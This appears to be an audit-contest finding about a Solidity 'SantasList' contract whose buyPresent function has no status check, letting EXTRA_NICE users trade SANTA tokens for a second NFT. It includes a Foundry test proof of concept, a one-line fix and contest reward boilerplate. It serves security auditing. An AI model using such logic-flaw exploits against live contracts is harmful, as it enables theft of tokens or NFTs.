Submission Details
Severity:
no check for status in buyPresent function
Summary
EXTRA_NICE users can call buyPresent function and trade their SANTA token for a second NFT.
Vulnerability Details
buyPresent function is set to external and there is no check for the status of the user calling the function. Therefore, an EXTRA_NICE user that has already claimed the present through collectPresentfunction can call the buyPresentfunction and trade its santa token for a second NFT.
Impact
EXTRA_NICE users can trade all of their Santa token for and NFT.
Proof of Concept
function testBuyPresentAttack() public {
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.EXTRA_NICE);
santasList.checkTwice(user, SantasList.Status.EXTRA_NICE);
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(user);
santasList.collectPresent();
assertEq(santasList.balanceOf(user), 1);
assertEq(santaToken.balanceOf(user), 1e18);
vm.stopPrank();
vm.startPrank(user);
santasList.buyPresent(user);
assertEq(santasList.balanceOf(user), 2);
vm.stopPrank();
}
Tools Used
Manual review
Recommendations
add an if statement and revert if user is not NAUGHTY
Rewards breakdown
nSLOC
116This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.